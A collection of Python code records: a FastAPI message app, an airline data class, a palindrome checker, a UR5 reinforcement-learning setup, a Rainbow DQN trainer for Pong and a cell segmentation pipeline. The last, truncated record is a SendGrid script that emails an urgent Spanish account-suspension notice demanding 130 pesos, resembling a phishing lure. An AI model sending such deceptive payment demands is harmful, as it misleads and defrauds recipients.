os.path.join(MESSAGES_PATH, 'sep20_interns.txt')\nSENIOR_QA_TRAINING_PICKLE = os.path.join(MESSAGES_PATH, 'senior_qa_training.pickle')\n\ndef get_pickle_contents(filename):\n \"Return the first variable of a pickle file\"\n contents = None\n if os.path.exists(filename):\n with open(filename, 'rb') as file_handler:\n contents = pickle.load(file_handler)\n\n return contents\n\ndef update_pickle_contents(filename, content):\n \"Update the contents of the pickle file\"\n with open(filename, 'wb+') as file_handler:\n pickle.dump(content, file_handler)\n\ndef get_senior_qa_training_user_index():\n \"Return the user index dict\"\n user_index_dict = get_pickle_contents(SENIOR_QA_TRAINING_PICKLE)\n user_index_dict = {} if user_index_dict is None else user_index_dict\n\n return user_index_dict\n\ndef set_senior_qa_training_user_index(user_index_dict):\n \"Update the user index for the senior QA training messages\"\n update_pickle_contents(SENIOR_QA_TRAINING_PICKLE, user_index_dict)\n\ndef get_weekday():\n \"Return the weekday\"\n return datetime.datetime.today().weekday()\n\ndef get_messages_from_file(filename):\n \"Return a list of culture related messages\"\n lines = []\n with open(filename, 'r') as file_handler:\n lines = file_handler.readlines()\n\n return lines\n\n@app.get(\"/\")\ndef index():\n \"The home page\"\n return {\"msg\":\"This is the endpoint for the home page. 
/message \\\n and /reminder are more useful starting points.\"}\n\n@app.get(\"/message\")\ndef get_message():\n \"Return a random message\"\n lines = get_messages_from_file(CULTURE_FILE)\n message = random.choice(lines)\n\n return {'msg':message.strip()}\n\n@app.get(\"/reminder\")\ndef get_reminder():\n \"Return a reminder based on day of the week\"\n weekday = get_weekday()\n #Note: Monday is 0 and Sunday is 6\n lines = reminders.messages.get(weekday, [''])\n message = \"Reminder: \" + random.choice(lines)\n\n return {'msg':message.strip()}\n\n@app.get(\"/sep20-interns\")\ndef get_sep20_message():\n \"Return a message for the Sep 2020 internship\"\n lines = get_messages_from_file(SEP20_INTERNS_FILE)\n\n return {'msg': random.choice(lines).strip()}\n\n@app.get(\"/training\")\ndef get_snior_qa_training_message(user: str = ''):\n \"Return a message for senior QA training\"\n lines = senior_qa_training.messages\n user_index_dict = {}\n if user:\n user_index_dict = get_senior_qa_training_user_index()\n message_index = user_index_dict.get(user, 0)\n message = lines[message_index%len(lines)]\n user_index_dict[user] = message_index + 1\n set_senior_qa_training_user_index(user_index_dict)\n else:\n message = random.choice(lines).strip()\n\n return {'msg': message}\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"337957486","text":"from opulence.common.fields import StringField\nfrom opulence.facts.bases import BaseFact\n\n\nclass Airline(BaseFact):\n _name_ = \"airline\"\n _description_ = \"Represent a airline company\"\n _author_ = \"Henry\"\n _version_ = 1\n\n def setup(self):\n self.name = StringField(mandatory=True)\n self.code_iata = StringField()\n self.code_icao = StringField()\n self.fullname = StringField()\n\n def get_summary(self):\n return \"{}\".format(self.name.value)\n","sub_path":"opulence/facts/modules/transport/airline.py","file_name":"airline.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"131648863","text":"def juge_palindrome(str):\n length = len(str)\n print(length)\n for i in range(int(length / 2)):\n if not str[i] == str[0-i-1]:\n print(\"{}不是回文数\".format(str))\n return\n print(\"{}是回文数\".format(str))\n\n\nnum = input(\"请输入一个整数:\")\njuge_palindrome(num)","sub_path":"课堂练习/练习3/练习3-4.py","file_name":"练习3-4.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"526591829","text":"\"\"\"\nThis file provides the template for designing the agent and environment.\n\nThe below hyperparameters must be assigned to a value for the algorithm to work\nproperly.\n\"\"\"\n\nimport numpy as np\nfrom hac.environment import UR5\nfrom hac.agent import Agent\n\n\ndef design_agent_and_env(flags):\n \"\"\"Instantiate the Agent and Environment classes for training.\n\n TODO\n\n Parameters\n ----------\n flags : argparse.Namespace\n the parsed arguments from the command line (see options.py)\n\n Returns\n -------\n hac.Agent\n the agent class\n hac.Environment\n the training environment\n \"\"\"\n # ======================================================================= #\n # Step 1. Design agent #\n # #\n # The key hyperparameters for agent construction are #\n # #\n # a. Number of levels in agent hierarchy #\n # b. 
Max sequence length in which each policy will specialize #\n # c. Max number of atomic actions allowed in an episode #\n # d. Environment timesteps per atomic action #\n # #\n # See Section 3 of this file for other agent hyperparameters that can be #\n # configured. #\n # ======================================================================= #\n\n # Enter max number of atomic actions. This will typically be\n # flags.time_scale**(flags.layers). However, in the UR5 Reacher task, we\n # use a shorter episode length.\n max_actions = 600\n\n # Provide the number of time steps per atomic action.\n timesteps_per_action = 15\n\n # ======================================================================= #\n # Step 2. Design environment #\n # #\n # a. Designer must provide the original UMDP (S,A,T,G,R). #\n # - The S,A,T components can be fulfilled by providing the Mujoco #\n # model. #\n # - The user must separately specifiy the initial state space. #\n # - G can be provided by specifying the end goal space. #\n # - R, which by default uses a shortest path {-1,0} reward function, #\n # can be implemented by specifying two components: (i) a function #\n # that maps the state space to the end goal space and (ii) the end #\n # goal achievement thresholds for each dimensions of the end goal. #\n # #\n # b. In order to convert the original UMDP into a hierarchy of k UMDPs, #\n # the designer must also provide #\n # - The subgoal action space, A_i, for all higher-level UMDPs i > 0 #\n # - R_i for levels 0 <= i < k-1 (i.e., all levels that try to achieve #\n # goals in the subgoal space). As in the original UMDP, R_i can be #\n # implemented by providing two components: (i) a function that maps #\n # the state space to the subgoal space and (ii) the subgoal #\n # achievement thresholds. #\n # #\n # c. Designer should also provide subgoal and end goal visualization #\n # functions in order to show video of training. These can be updated #\n # in \"display_subgoal\" and \"display_end_goal\" methods in the #\n # \"environment.py\" file. #\n # ======================================================================= #\n\n # Provide file name of Mujoco model(i.e., \"pendulum.xml\"). Make sure file\n # is stored in \"mujoco_files\" folder\n model_name = \"ur5.xml\"\n\n # Provide initial state space consisting of the ranges for all joint angles\n # and velocities. In the UR5 Reacher task, we use a random initial shoulder\n # position and use fixed values for the remainder. Initial joint velocities\n # are set to 0.\n initial_joint_pos = [(-np.pi / 8, np.pi / 8),\n (3.22757851e-03, 3.22757851e-03),\n (-1.27944547e-01, -1.27944547e-01)]\n initial_joint_speed = [(0, 0) for _ in range(len(initial_joint_pos))]\n initial_state_space = initial_joint_pos + initial_joint_speed\n\n # Provide end goal space. The code supports two types of end goal spaces if\n # user would like to train on a larger end goal space. If user needs to\n # make additional customizations to the end goals, the \"get_next_goal\"\n # method in \"environment.py\" can be updated.\n\n # In the UR5 reacher environment, the end goal will be the desired joint\n # positions for the 3 main joints.\n goal_space_train = [(-np.pi, np.pi), (-np.pi/4, 0), (-np.pi/4, np.pi/4)]\n goal_space_test = [(-np.pi, np.pi), (-np.pi/4, 0), (-np.pi/4, np.pi/4)]\n\n # Provide a function that maps from the state space to the end goal space.\n # This is used to determine whether the agent should be given the sparse\n # reward. 
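# --- hedged example (not part of the source corpus) -------------------------
# A minimal sketch of the sparse {-1, 0} shortest-path reward described above:
# project the state into goal space and compare the per-dimension error
# against the achievement thresholds. Function names are illustrative.
import numpy as np

def goal_achieved(projected_state, goal, thresholds):
    return bool(np.all(np.abs(projected_state - goal) <= thresholds))

def shortest_path_reward(projected_state, goal, thresholds):
    return 0.0 if goal_achieved(projected_state, goal, thresholds) else -1.0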
It is also used for Hindsight Experience Replay to determine\n # which end goal was achieved after a sequence of actions.\n\n # Supplementary function that will ensure all angles are between\n # [-2*np.pi,2*np.pi]\n\n def bound_angle(angle):\n bounded_angle = np.absolute(angle) % (2 * np.pi)\n if angle < 0:\n bounded_angle = -bounded_angle\n return bounded_angle\n\n def project_state_to_end_goal(sim, *_):\n return np.array([bound_angle(sim.data.qpos[i])\n for i in range(len(sim.data.qpos))])\n\n # Set end goal achievement thresholds. If the agent is within the threshold\n # for each dimension, the end goal has been achieved and the reward of 0 is\n # granted.\n angle_threshold = np.deg2rad(10)\n end_goal_thresholds = np.array([angle_threshold for _ in range(3)])\n\n # Provide range for each dimension of subgoal space in order to configure\n # subgoal actor networks. Subgoal space can be the same as the state space\n # or some other projection out of the state space. In our implementation of\n # the UR5 reacher task, the subgoal space is the state space, which is the\n # concatenation of all joint positions and joint velocities.\n subgoal_bounds = np.array([[-2 * np.pi, 2 * np.pi],\n [-2 * np.pi, 2 * np.pi],\n [-2 * np.pi, 2 * np.pi],\n [-4, 4],\n [-4, 4],\n [-4, 4]])\n\n # Provide state to subgoal projection function.\n def project_state_to_subgoal(sim, *_):\n return np.concatenate((\n np.array([bound_angle(sim.data.qpos[i])\n for i in range(len(sim.data.qpos))]),\n np.array([4 if sim.data.qvel[i] > 4 else -4\n if sim.data.qvel[i] < -4 else sim.data.qvel[i]\n for i in range(len(sim.data.qvel))])\n ))\n\n # Set subgoal achievement thresholds\n velo_threshold = 2\n subgoal_thresholds = np.concatenate(\n (np.array([angle_threshold for _ in range(3)]),\n np.array([velo_threshold for _ in range(3)])))\n\n # To properly visualize goals, update \"display_end_goal\" and\n # \"display_subgoals\" methods in \"environment.py\"\n\n # ======================================================================= #\n # Step 3. Set miscellaneous hyperparameters #\n # #\n # Below are some other agent hyperparameters that can affect results, #\n # including #\n # #\n # a. Subgoal testing percentage #\n # b. Subgoal penalty #\n # c. Exploration noise #\n # d. Replay buffer size #\n # #\n # For other relevant agent hyperparameters, refer to the \"agent.py\" and #\n # \"layer.py\" files. #\n # ======================================================================= #\n\n agent_params = {\n # Define percentage of actions that a subgoal level (i.e. level i > 0)\n # will test subgoal actions\n \"subgoal_test_perc\": 0.3,\n\n # Define subgoal penalty for missing subgoal. Please note that by\n # default the Q value target for missed subgoals does not include\n # Q-value of next state (i.e, discount rate = 0). As a result, the\n # Q-value target for missed subgoal just equals penalty. For instance\n # in this 3-level UR5 implementation, if a level proposes a subgoal and\n # misses it, the Q target value for this action would be -10. 
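# --- hedged example (not part of the source corpus) -------------------------
# Illustration of the Q-value target described above: with discount rate 0 on
# missed subgoals, the target collapses to the penalty itself (e.g. -10 when
# time_scale is 10); otherwise the usual bootstrapped target applies. Names
# are illustrative, not the repository's own API.
def subgoal_q_target(achieved, reward, gamma, next_q, penalty):
    if not achieved:
        return penalty
    return reward + gamma * next_q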
To\n # incorporate the next state in the penalty, go to the\n # \"penalize_subgoal\" method in the \"layer.py\" file.\n \"subgoal_penalty\": -flags.time_scale,\n\n # Define exploration noise that is added to both subgoal actions and\n # atomic actions.\n # Noise added is Gaussian N(0, noise_percentage * action_dim_range)\n \"atomic_noise\": [0.1 for _ in range(3)],\n \"subgoal_noise\": [0.03 for _ in range(6)],\n\n # Define number of episodes of transitions to be stored by each level\n # of the hierarchy\n \"episodes_to_store\": 500,\n\n # Provide training schedule for agent. Training by default will\n # alternate between exploration and testing. Hyperparameter below\n # indicates number of exploration episodes. Testing occurs for 100\n # episodes. To change number of testing episodes, go to \"ran_HAC.py\".\n \"num_exploration_episodes\": 50\n }\n\n # ======================================================================= #\n # Step 4: Instantiate and return agent and environment. #\n # ======================================================================= #\n\n env = UR5(model_name, goal_space_train, goal_space_test,\n project_state_to_end_goal, end_goal_thresholds,\n initial_state_space, subgoal_bounds,\n project_state_to_subgoal, subgoal_thresholds,\n max_actions, timesteps_per_action, flags.show)\n\n agent = Agent(flags, env, agent_params)\n\n return agent, env\n","sub_path":"example_designs/ur5.py","file_name":"ur5.py","file_ext":"py","file_size_in_byte":11124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"518438374","text":"\nimport math, random\n\nimport gym\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.autograd as autograd\nimport torch.nn.functional as F\n\nfrom common.layers import NoisyLinear\nfrom common.replay_buffer import ReplayBuffer\nfrom common.replay_buffer import PrioritizedReplayBuffer\n\nfrom common.wrappers import make_atari, wrap_deepmind, wrap_pytorch\n\nUSE_CUDA = torch.cuda.is_available()\nVariable = lambda *args, **kwargs: autograd.Variable(*args, **kwargs).cuda() if USE_CUDA else autograd.Variable(*args,**kwargs)\n\n\nfrom utils.hyperparameters import Config\n\nconfig = Config()\n\nconfig.num_atoms = 51\nconfig.Vmin = -200\nconfig.Vmax = 200\n\nconfig.num_frames = 1000000\nconfig.batch_size = 32\nconfig.gamma = 0.99\n\nconfig.epsilon_start = 1.0\nconfig.epsilon_final = 0.01\nconfig.epsilon_decay = 500\n\nconfig.learning_rate=1e-3\nconfig.gamma=0.99\nconfig.buffer_size=10000\nconfig.replace_iter_num=1000\nconfig.use_noisy=True\nconfig.n_step=3\n\nconfig.prioritized_replay=True\nconfig.prioritized_replay_alpha =0.6\nconfig.prioritized_replay_beta= 0.4\n\nconfig.hidden_before=[32,64]\nconfig.hidden_after=[32,64]\n\n\nclass Agent:\n def __init__(self,oEnv):\n self.num_atoms = config.num_atoms\n self.Vmin = config.Vmin\n self.Vmax = config.Vmax\n\n self.num_frames = config.num_frames\n self.batch_size = config.batch_size\n self.gamma = config.gamma\n\n self.epsilon_start = config.epsilon_start\n self.epsilon_final =config.epsilon_final\n self.epsilon_decay = config.epsilon_decay\n\n self.learning_rate = config.learning_rate\n self.gamma=config.gamma\n self.buffer_size = config.buffer_size\n self.replace_iter_num =config.replace_iter_num\n self.use_noisy =config.use_noisy\n self.n_step = config.n_step\n\n self.prioritized_replay=config.prioritized_replay\n self.prioritized_replay_alpha=config.prioritized_replay_alpha\n 
self.prioritized_replay_beta=config.prioritized_replay_beta\n\n self.hidden_before=config.hidden_before\n self.hidden_after=config.hidden_after\n\n\n self.epsilon_by_frame = lambda frame_idx: self.epsilon_final + (self.epsilon_start - self.epsilon_final) * math.exp(-1. * frame_idx / self.epsilon_decay)\n\n self.env=oEnv\n self.nstep_buffer=[]\n\n if self.prioritized_replay:\n self.replay_buffer=PrioritizedReplayBuffer(self.buffer_size,alpha=self.prioritized_replay_alpha)\n else:\n self.replay_buffer = ReplayBuffer(self.buffer_size)\n\n self.current_model = RainbowDQN(oEnv,oEnv.observation_space.shape, oEnv.action_space.n, self.num_atoms,\n self.Vmin, self.Vmax,self.use_noisy,hidden_before=self.hidden_before,hidden_after=self.hidden_after)\n self.target_model = RainbowDQN(oEnv,oEnv.observation_space.shape, oEnv.action_space.n, self.num_atoms,\n self.Vmin, self.Vmax,self.use_noisy,hidden_before=self.hidden_before,hidden_after=self.hidden_after)\n if USE_CUDA:\n current_model = self.current_model.cuda()\n target_model = self.target_model.cuda()\n\n self.optimizer = optim.Adam(current_model.parameters(), self.learning_rate)\n\n self.update_target(current_model, target_model)\n\n\n def update_target(self,current_model, target_model):\n target_model.load_state_dict(current_model.state_dict())\n\n def projection_distribution(self,next_state, rewards, dones):\n batch_size = next_state.size(0)\n\n delta_z = float(self.Vmax - self.Vmin) / (self.num_atoms - 1)\n support = torch.linspace(self.Vmin, self.Vmax, self.num_atoms)\n\n next_dist = self.target_model(next_state).data.cpu()\n\n next_dist_action = next_dist * support\n # print(\"next\",next_dist.shape,next_dist_action.shape)\n next_action = next_dist_action.sum(2).max(1)[1]\n next_action = next_action.unsqueeze(1).unsqueeze(1).expand(next_dist.size(0), 1, next_dist.size(2))\n next_dist = next_dist.gather(1, next_action).squeeze(1)\n\n rewards = rewards.unsqueeze(1).expand_as(next_dist)\n dones = dones.unsqueeze(1).expand_as(next_dist)\n support = support.unsqueeze(0).expand_as(next_dist)\n\n Tz = rewards + (1 - dones) * (self.gamma**self.n_step) * support\n Tz = Tz.clamp(min=self.Vmin, max=self.Vmax)\n b = (Tz - self.Vmin) / delta_z\n l = b.floor().long()\n u = b.ceil().long()\n equal = l == u\n offset = torch.linspace(0, (batch_size - 1) * self.num_atoms, batch_size).long().unsqueeze(1).expand(batch_size,self.num_atoms)\n\n proj_dist = torch.zeros(next_dist.size())\n proj_dist.view(-1).index_add_(0, (l + offset).view(-1),\n (next_dist * (u.float() - b + equal.float())).view(-1))\n proj_dist.view(-1).index_add_(0, (u + offset).view(-1), (next_dist * (b - l.float())).view(-1))\n\n return proj_dist\n\n def compute_td_loss(self,batch_size):\n if self.prioritized_replay:\n state, action, reward, next_state, done, weights, indices = self.replay_buffer.sample(batch_size, self.prioritized_replay_beta)\n weights=Variable(torch.FloatTensor(weights))\n else:\n state, action, reward, next_state, done = self.replay_buffer.sample(batch_size)\n weights=1\n\n state = Variable(torch.FloatTensor(np.float32(state)))\n next_state = Variable(torch.FloatTensor(np.float32(next_state)), volatile=True)\n action = Variable(torch.LongTensor(action))\n\n if self.num_atoms > 1:\n reward = torch.FloatTensor(reward)\n done = torch.FloatTensor(np.float32(done))\n proj_dist = self.projection_distribution(next_state, reward, done)\n dist = self.current_model(state)\n action = action.unsqueeze(1).unsqueeze(1).expand(batch_size, 1, self.num_atoms)\n dist = dist.gather(1, 
action).squeeze(1)\n dist.data.clamp_(0.01, 0.99)\n loss = -(Variable(proj_dist) * dist.log()).sum(1)*weights\n prios = loss + 1e-5\n else:\n reward = Variable(torch.FloatTensor(reward))\n done = Variable(torch.FloatTensor(np.float32(done)))\n q_values = self.current_model(state)\n next_q_values = self.target_model(next_state)\n\n q_value = q_values.gather(1, action.unsqueeze(1)).squeeze(1)\n next_q_value = next_q_values.max(1)[0]\n\n expected_q_value = reward + (self.gamma **self.n_step)* next_q_value * (1 - done)\n loss = (q_value - Variable(expected_q_value.detach())).pow(2)*weights\n prios = loss + 1e-5\n\n loss = loss.mean()\n\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n if self.prioritized_replay:\n self.replay_buffer.update_priorities(indices,prios.data.cpu().numpy())\n\n self.current_model.reset_noise()\n self.target_model.reset_noise()\n\n return loss\n\n def append_to_replay(self,s, a, r, s_, done):\n self.nstep_buffer.append((s, a, r, s_, done))\n if len(self.nstep_buffer) < self.n_step:\n return\n R = sum([self.nstep_buffer[i][2] * (self.gamma ** i) for i in range(self.n_step)])\n state, action, _, _, _ = self.nstep_buffer.pop(0)\n self.replay_buffer.push(state, action, R, s_, done)\n\n def finish_nstep(self,):\n while (len(self.nstep_buffer) > 0):\n R = sum([self.nstep_buffer[i][2] * (self.gamma ** i) for i in range(len(self.nstep_buffer))])\n state, action, reward, state_, _ = self.nstep_buffer.pop(0)\n self.replay_buffer.push(state, action, R, state_, True)\n\n def Train(self,):\n losses = []\n all_rewards = []\n episode_reward = 0\n oEnv=self.env\n\n state = oEnv.reset()\n for frame_idx in range(1, self.num_frames + 1):\n epsilon = self.epsilon_by_frame(frame_idx)\n action = self.current_model.act(state, epsilon)\n\n next_state, reward, done, _ = oEnv.step(action)\n\n # oEnv.render()\n self.append_to_replay(state, action, reward, next_state, done)\n\n state = next_state\n episode_reward += reward\n\n if done:\n self.finish_nstep()\n state = oEnv.reset()\n all_rewards.append(episode_reward)\n episode_reward = 0\n\n if len(self.replay_buffer) > self.batch_size:\n loss = self.compute_td_loss(self.batch_size)\n losses.append(loss.data[0])\n\n if frame_idx % self.replace_iter_num == 0:\n self.update_target(self.current_model, self.target_model)\n\n if frame_idx % 3000 == 0:\n print(\"frame\", frame_idx)\n\nclass RainbowDQN(nn.Module):\n def __init__(self, oEnv,input_shape, num_actions, num_atoms, Vmin, Vmax,use_noisy,hidden_before,hidden_after):\n super(RainbowDQN, self).__init__()\n self.env=oEnv\n self.input_shape = input_shape\n self.num_actions = num_actions\n self.num_atoms = num_atoms\n self.Vmin = Vmin\n self.Vmax = Vmax\n self.use_noisy=use_noisy\n\n self.features = nn.Sequential(\n nn.Conv2d(input_shape[0], 32, kernel_size=8, stride=4),\n nn.ReLU(),\n nn.Conv2d(32, 64, kernel_size=4, stride=2),\n nn.ReLU(),\n nn.Conv2d(64, 64, kernel_size=3, stride=1),\n nn.ReLU()\n )\n\n # self.linear1 = nn.Linear(self.feature_size(), 32)\n # self.linear2 = nn.Linear(32, 64)\n\n if self.use_noisy:\n self.value1 = NoisyLinear(self.feature_size(), 512, use_cuda=USE_CUDA)\n self.value2 = NoisyLinear(512, self.num_atoms, use_cuda=USE_CUDA)\n\n self.advantage1 = NoisyLinear(self.feature_size(), 512, use_cuda=USE_CUDA)\n self.advantage2 = NoisyLinear(512, self.num_atoms * self.num_actions, use_cuda=USE_CUDA)\n else:\n self.value1= nn.Linear(self.feature_size(), 512)\n self.value2= nn.Linear(512, self.num_atoms)\n self.advantage1=nn.Linear(self.feature_size(), 
512)\n self.advantage2=nn.Linear(512, self.num_atoms * self.num_actions)\n\n def feature_size(self):\n return self.features(autograd.Variable(torch.zeros(1, *self.input_shape))).view(1, -1).size(1)\n\n\n def forward(self, x):\n batch_size = x.size(0)\n\n x = x / 255.\n x = self.features(x)\n x = x.view(batch_size, -1)\n\n value = F.relu(self.value1(x))\n value = self.value2(value)\n\n advantage = F.relu(self.advantage1(x))\n advantage = self.advantage2(advantage)\n\n if self.num_atoms>1:\n value = value.view(batch_size, 1, self.num_atoms)\n advantage = advantage.view(batch_size, self.num_actions, self.num_atoms)\n\n x = value + advantage - advantage.mean(1, keepdim=True)\n x = F.softmax(x.view(-1, self.num_atoms)).view(-1, self.num_actions, self.num_atoms)\n # x=F.softmax(x,-1)\n else:\n x=value+advantage-advantage.mean()\n\n return x\n\n def reset_noise(self):\n if self.use_noisy:\n self.value1.reset_noise()\n self.value2.reset_noise()\n self.advantage1.reset_noise()\n self.advantage2.reset_noise()\n\n def act(self, state,epsilon=0.02):\n if random.random() < epsilon:\n action = random.randrange(self.env.action_space.n)\n else:\n if self.num_atoms>1:\n state = Variable(torch.FloatTensor(state).unsqueeze(0), volatile=True)\n dist = self.forward(state).data.cpu()\n dist = dist * torch.linspace(self.Vmin, self.Vmax, self.num_atoms)\n action = dist.sum(2).max(1)[1].numpy()[0]\n else:\n state = Variable(torch.FloatTensor(state).unsqueeze(0), volatile=True)\n q_value = self.forward(state)\n action = q_value.max(1)[1].cpu().numpy()[0]\n\n return action\n\n\nclass MyReward(gym.Wrapper):\n def __init__(self, env):\n super(MyReward, self).__init__(env)\n self.m_RwardList = []\n self.m_Lost=[]\n self.m_count = 0\n\n def step(self, action):\n obs, reward, done, info = self.env.step(action)\n # reward=0\n self.m_count += 1\n # print(\"reware\",self.m_count,action,reward,done,info)\n if reward>0:\n self.m_RwardList.append(reward)\n elif reward<0:\n self.m_Lost.append(reward)\n if done:\n # if info[\"done\"]:\n # reward=100\n # self.m_RwardList.append(reward)\n iMeanReward = np.sum(self.m_RwardList)\n iLost = np.sum(self.m_Lost)\n print(\"mean_reward\", iMeanReward,iLost)\n self.m_RwardList = []\n self.m_Lost = []\n return obs, reward, done, info\n\n\ndef Train():\n env_id = \"PongNoFrameskip-v4\"\n oEnv = make_atari(env_id)\n print(\"atari\",oEnv)\n oEnv = wrap_deepmind(oEnv)\n oEnv = wrap_pytorch(oEnv)\n oEnv = MyReward(oEnv)\n agent = Agent(oEnv)\n agent.Train()\n\n\n\nif __name__==\"__main__\":\n Train()","sub_path":"Torch/torch_cnn_rainbow.py","file_name":"torch_cnn_rainbow.py","file_ext":"py","file_size_in_byte":13308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"146349064","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n\n\n\"\"\"\nimport click\nimport logging\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport skimage\nfrom scipy import ndimage as ndi\nfrom PIL import Image\nimport gzip\nimport matplotlib.patches as mpatches\n\nfrom Segmentation_pipeline_helper import find, watershed_lab, resize_pad\nfrom Segmentation_pipeline_helper import shift_center_mass, pixel_norm\n\n############################################\n# EXECUTION PIPELINE FOR CELL SEGMENTATION #\n############################################\n\n\ndef extract_img_arrays(microtubule_imgs, protein_imgs, nuclei_imgs):\n \"\"\"\n Extract the numerical arrays that represent the input images.\n Extracts only the relevant channel of the input 
image if it is RGB,\n blue for nuclei, red for microtubule, and green for proteins.\n\n This always results in every returned array being 2D (grayscale).\n\n The function assumes that all the input lists are of the same length.\n If an image is missing, all channels on the same index will be skipped.\n\n Arguments:\n microtubule_imgs: A list of paths to microtubule images.\n protein_imgs: A list of paths to protein images.\n nuclei_imgs: A list of paths to nuclei images.\n\n Returns:\n A generator which yields grayscale image tuples from the input images.\n (grayscale microtubule, grayscale protein, grayscale nuclei).\n\n Raises:\n IndexError: if the input lists are not the same size.\n \"\"\"\n image_arrays = []\n num_images = len(nuclei_imgs)\n for index in range(num_images):\n nuclei_img = nuclei_imgs[index]\n microtubule_img = microtubule_imgs[index]\n protein_img = protein_imgs[index]\n\n current_array = []\n\n for i, img in enumerate([microtubule_img, protein_img, nuclei_img]):\n try:\n if img.endswith('.gz'):\n file_handle = gzip.open(img)\n else:\n file_handle = open(img)\n img_arr = plt.imread(file_handle)\n file_handle.close()\n\n if len(img_arr.shape) > 2:\n img_arr = img_arr[:, :, i]\n current_array.append(img_arr)\n\n except IOError as e:\n logging.error('{}, when reading {}'.format(e, img))\n\n yield current_array\n\n\ndef plot_boundaries(nucleus_array, regions):\n fig, ax = plt.subplots(figsize=(10, 6))\n ax.imshow(nucleus_array)\n for region in regions:\n # take regions with large enough areas\n if region.area >= 20000:\n # draw rectangle around segmented coins\n minr, minc, maxr, maxc = region.bbox\n rect = mpatches.Rectangle((minc, minr), maxc - minc, maxr - minr,\n fill=False, edgecolor='red', linewidth=2)\n ax.add_patch(rect)\n ax.set_axis_off()\n plt.tight_layout()\n plt.show()\n\n\ndef cut_bounding_box(im_arrays, plot=False):\n \"\"\"\n Cut out individual cells from images.\n Each of the arguments to this function should be lists of the same length.\n The elements on the same index in the different arrays are assumed to be\n from the same original image.\n\n Arguments:\n microtubule_arrays: A list of grayscale microtubule image arrays.\n protein_arrays: A list of grayscale protein image arrays.\n nuclei_arrays: A list of grayscale nuclei image arrays.\n\n Returns:\n A generator which yields a list of cell arrays for each image\n in succession.\n \"\"\"\n images = []\n for arrays in im_arrays:\n cells = []\n seeds, num = watershed_lab(arrays[2], rm_border=True)\n\n regions = skimage.measure.regionprops(seeds)\n if plot:\n plot_boundaries(arrays[2], regions)\n\n for i, region in enumerate(regions):\n minr, minc, maxr, maxc = region.bbox\n mask = seeds[minr:maxr, minc:maxc].astype(np.uint8)\n mask[mask != region.label] = 0\n mask[mask == region.label] = 1\n\n cell_nuclei = pixel_norm(arrays[2][minr:maxr, minc:maxc] * mask)\n cell_nucleoli = pixel_norm(arrays[1][minr:maxr, minc:maxc] * mask)\n cell_microtubule = np.full_like(cell_nuclei, 0)\n\n cell = np.dstack((cell_microtubule, cell_nucleoli, cell_nuclei))\n cell = (cell * 255).astype(np.uint8) # the input file was uint16\n\n # Align cell orientation\n theta = region.orientation * 180 / np.pi # radiant to degree\n cell = ndi.rotate(cell, 90 - theta)\n\n cells.append(cell)\n yield cells\n\n return images\n\n\n@click.command()\n@click.argument('imageinput')\n@click.argument('imageoutput')\n@click.option('--blue-suffix', default='blue.tif.gz',\n help='Set the blue image suffix')\n@click.option('--green-suffix', 
default='green.tif.gz',\n help='Set the green image suffix')\n@click.option('--red-suffix', default='red.tif.gz',\n help='Set the red image suffix')\n@click.option('--plot-boundaries', default=False, is_flag=True)\n@click.option('--verbose', default=False, is_flag=True)\ndef main(imageinput, imageoutput, blue_suffix, green_suffix, red_suffix,\n verbose, plot_boundaries):\n if not os.path.exists(imageoutput):\n os.makedirs(imageoutput)\n\n if verbose:\n numeric_level = getattr(logging, 'INFO')\n logging.basicConfig(level=numeric_level)\n\n nuclei_imgs = find(imageinput, suffix=blue_suffix, recursive=False)\n microtubule_imgs = []\n protein_imgs = []\n logging.info('Finding images')\n\n for nucleus_img in nuclei_imgs:\n microtubule_imgs.append(nucleus_img.replace(blue_suffix, red_suffix))\n protein_imgs.append(nucleus_img.replace(blue_suffix, green_suffix))\n\n logging.info('Setting up extraction')\n im_arrays = extract_img_arrays(microtubule_imgs, protein_imgs, nuclei_imgs)\n\n logging.info('Setting up bounding box separation')\n cells = cut_bounding_box(im_arrays, plot=plot_boundaries)\n\n if plot_boundaries:\n logging.info('Segmentation plots enabled')\n logging.info('Segmenting')\n for i, (image, filename) in enumerate(zip(cells, nuclei_imgs)):\n if verbose:\n progress = i / len(nuclei_imgs) * 100\n print('\\r{:.2f}% done'.format(progress), end='', flush=True)\n\n filename = filename.replace(blue_suffix, '')\n filename = os.path.basename(filename)\n filename = os.path.join(imageoutput, filename)\n\n for i, cell in enumerate(image):\n fig = resize_pad(cell)\n fig = shift_center_mass(fig)\n fig = Image.fromarray(fig)\n\n savename = filename + str(i) + '.png'\n fig.save(savename)\n\n if verbose:\n print()\n\nif __name__ == '__main__':\n main()\n","sub_path":"Segmentation_pipeline_nuclei.py","file_name":"Segmentation_pipeline_nuclei.py","file_ext":"py","file_size_in_byte":6815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"145890004","text":"# import os\nfrom sendgrid import SendGridAPIClient\nfrom sendgrid.helpers.mail import (Mail, Attachment, FileContent, FileName, FileType, Disposition)\nimport base64\n\nmessage = Mail(\n from_email='pepito@bellako.cl',\n to_emails='empatiaindustries@gmail.com',\n subject='Urgente tu cuenta se suspendera por no pago',\n html_content='
Tu cuenta nos debe un total de : 130 pesos
